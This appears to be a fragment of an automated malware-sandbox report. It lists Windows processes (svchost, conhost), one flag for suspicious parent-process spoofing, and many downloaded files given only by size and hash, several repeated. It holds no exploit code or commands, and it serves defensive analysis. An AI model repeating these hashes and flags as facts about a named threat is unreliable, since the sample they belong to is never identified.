c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:932
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:748
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1248
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3956
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5ddc7bc0f2b67aff326b642e581e00539
SHA1c9a4b0ca59a51c0dccccdbb53c3e9ae3684bf528
SHA256b3ad4f3f98b06347516e43d4af5e880c84fad7623afde9af8a428a17e5013801
SHA5129549eb6af1efccbd9e85901c9203efa698e80b285cdf06066fa48bd7c1767279849790947078870ab57565cb5a5b8c68de6287f177ae9022ec147cbb3c4caddd
-
Filesize
34KB
MD5f58ac070d4660b23e8a8cad839b4a731
SHA145c6389c3787cd8055e82da882c238fac8d04523
SHA25654f75ac36902edb1b63ab8852e8d11fe6b174095fea7f1e88fcd8798d6f279b0
SHA5127237c4a26afb55880cf4cd547848f48f237c8f3749bf874349c9f13fb74e0c7e1f18bd4f40993b4622b8e0ad14b53076913a8613e67b06c6a6e3fff9e784e9e0
-
Filesize
12KB
MD54895ba7bcacf40b2545bf6bb6a1b136c
SHA1d49f19f7a75e4ca92283213ccd2d38de2c233db3
SHA256aa02fa0cc00061eb16eec7b468274bbdc78a24ea483478f74424fe5e95501369
SHA512b1e857ec313629904598bd835784492cc95f612408987f7b561b96d7920d73cadafd479e9f7fcc5831e9982c03b6009c7077b7166a1913c6760d4c1248ddbf3c
-
Filesize
12KB
MD56013be2c4af36bcc6498e015a1e2752c
SHA161849b968afc5cdba6fe1f51f168d2f08159acf7
SHA256d4c72d2b9f603ed97f4577162b4bfec6a8944a8c54b313c8f0c67d8f79465501
SHA51297c590e65bec5a8ea39ec222c7f0fae451511097f55b52e9fea37d9b67ee1bafa09cd99b01523176e07f1386c121218eab59ea73fa0b3f74b00f258cf3d52c28
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD5e869c5dc5a599d23a0039c545de695f9
SHA1b4fe398c90ffd42d444d0bd3bcd47b877ba1110e
SHA2566320ac5f5bd42a4d2b7e527aa54f7c76b996f4ddd6e41ef307c2aaf0769d8e21
SHA512fc4e20995058a78b1f3582041c7cc7578b4a6c979e82a3d0e161477649e533a3627b46825d2f386dabfbc5e3e5851b8826ffdb767a30f2d807c8692c90faa574
-
Filesize
1KB
MD52eb385ba461049b7fed827c70177e82d
SHA12a03cfd835d492a6e70e7fb92587e974ef3ffd2b
SHA256af9f11d6535825243aad3d7b93d27e89a042c0482b7142ce04a16e67feef1f13
SHA51235d4cb7922982fcbc528040ec76e0cb97b1e7c43a8e7052d123186cd5a4bdedc20c1e1259b57704fb821f6c3973c91936488e79f855019e22b5c4f3f40314f0c
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
7.2MB
MD5d121a0468485d70b575e278d407bb76e
SHA1aa632a96db84885afe0175cfaafbb7317d5fb0ac
SHA2564f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325
SHA51259c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f
-
Filesize
7.2MB
MD5d121a0468485d70b575e278d407bb76e
SHA1aa632a96db84885afe0175cfaafbb7317d5fb0ac
SHA2564f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325
SHA51259c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f
-
Filesize
822.9MB
MD544dd3b7591d98ccba2a6bb3a07c005bf
SHA19ca3b82d234f3a25110e6e5e0151dfad183319a4
SHA2561919a06dfe762f0957818926406ba401cd5c7c09810a9364ee8e9a4649833e3c
SHA512e0d02e357f05d3812b2c26bd6f9353da6055d604bca7fa532dcd2fb278c8de1a3e255a0feb9e442e0de2d4c074637d8b67a177763b587b123f19f48d9e734df9
-
Filesize
822.9MB
MD544dd3b7591d98ccba2a6bb3a07c005bf
SHA19ca3b82d234f3a25110e6e5e0151dfad183319a4
SHA2561919a06dfe762f0957818926406ba401cd5c7c09810a9364ee8e9a4649833e3c
SHA512e0d02e357f05d3812b2c26bd6f9353da6055d604bca7fa532dcd2fb278c8de1a3e255a0feb9e442e0de2d4c074637d8b67a177763b587b123f19f48d9e734df9
-
Filesize
5.0MB
MD524ece515d8082af9bbf326e17e9f0670
SHA19b7e8e37f2a27ee3c92835873e446686e6f0a723
SHA2568c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe
SHA512e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
5.0MB
MD524ece515d8082af9bbf326e17e9f0670
SHA19b7e8e37f2a27ee3c92835873e446686e6f0a723
SHA2568c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe
SHA512e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2
-
Filesize
5.0MB
MD524ece515d8082af9bbf326e17e9f0670
SHA19b7e8e37f2a27ee3c92835873e446686e6f0a723
SHA2568c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe
SHA512e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2